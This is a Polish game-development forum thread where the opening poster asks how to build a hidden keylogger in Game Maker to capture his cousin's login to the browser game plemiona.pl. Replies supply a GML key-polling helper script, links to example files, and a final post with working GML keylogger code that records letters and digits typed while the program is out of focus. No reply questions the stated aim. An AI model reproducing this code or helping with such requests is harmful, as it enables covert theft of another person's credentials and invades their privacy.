Skocz do zawartości

Czemu nie ma keyboard_string_direct? + ukryte okno


Rekomendowane odpowiedzi

Chcę zrobić keyloggera bo niedługo kuzyn przyjedzie i będzie się na plemiona.pl logował, tylko problem w tym, że moge sobie zrobić zmienną text i text=keyboard_string ale tylko bedzie sie wtedy zapisywac gdy bedzie okno z grą włączane a gdyby bylo keyboard_string_direct to by nie trzeba było miec aktywne okno. Da sie jakos tak zrobic? Bo przeciez nie bede robic do kazdego klawisza if keyboard_check_direct i w dodatku jak jest check to raz nacisne a sie trzy litery pojawia jak ciut dluzej przytrzymam a juz pressed_direct tez nie ma. No i czy da sie zobic ukryte okno i sie pokaze spowrotem jak sie wcisnie jakąś kombinacje klawiszy?

Odnośnik do komentarza
Udostępnij na innych stronach

kiedyś napisałem taki skrypcik o nazwie "keyboard_check_direct_pressed"

 

oto on:

GML (keyboard check direct pressed)
if ( variable_local_array_get( 'press' , argument0 ) = 0 ) press[ argument0 ] = -1

 

if ( keyboard_check_direct( argument0 ))

{

if ( press[ argument0 ] = -1 ) press[ argument0 ] = true

 

}

else

press[ argument0 ] = -1

 

 

if ( press[ argument0 ] == true ) return true else return false

 

oraz drugi ("direct_pressed_end") również potrzebny:

GML (directpressedend)
press[ argument0 ] = noone

 

użycie takiego skryptu wygląda tak:

 

if ( keyboard_check_direct_pressed( ord( 'A' )) == true )

{

//akcje

 

direct_pressed_end( ord( 'A' )); - nie zapomnij tego użyć, to informuje system, że klawisz został wciśnięty.

}

Odnośnik do komentarza
Udostępnij na innych stronach

  • Administratorzy
co? w jakiej przeglądarce?

 

A co, w plemiona nie gra się przez przeglądarkę?

 

Btw.: http://hurkel.gmclan.org/tymon/?path=gamem...ute_keybuff.gm6 lub http://hurkel.gmclan.org/tymon/?path=gamem...with_numkey.gm6

Odnośnik do komentarza
Udostępnij na innych stronach

Heh.

Ostatnio też zacząłem robić sobie keyloggera, ponieważ żaden z internetu mnie nie zadowalał...

 

Jako to, że kodem lubie sie dzielić, pokaże jakim ja sposobem robię keyloggera w gm.

W Create:

GML
text=""

text_pressed=""

W Step:

GML
chair_table="ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 "

chair_numbers=string_length(chair_table)

//show_message(string(chair_table)+" "+string(chair_numbers))

for(a=0;a<=chair_numbers;a+=1)

{

var key_pressed; key_pressed=0;

chair_current= string_char_at(chair_table,a)

if keyboard_check_direct(ord(chair_current)) key_pressed=1

 

chair_pressed=string_pos(chair_current,text_pressed)

if chair_pressed=0 && key_pressed=1 { text_pressed+=string(chair_current) text+=string(chair_current) }

if chair_pressed!=0 && key_pressed=0 { text_pressed=string_replace_all(text_pressed,chair_current," ") }

}

Na razie działa to tylko na litery i cyfry, bez wielkosci liter. i o to cały keylogger :D
Odnośnik do komentarza
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...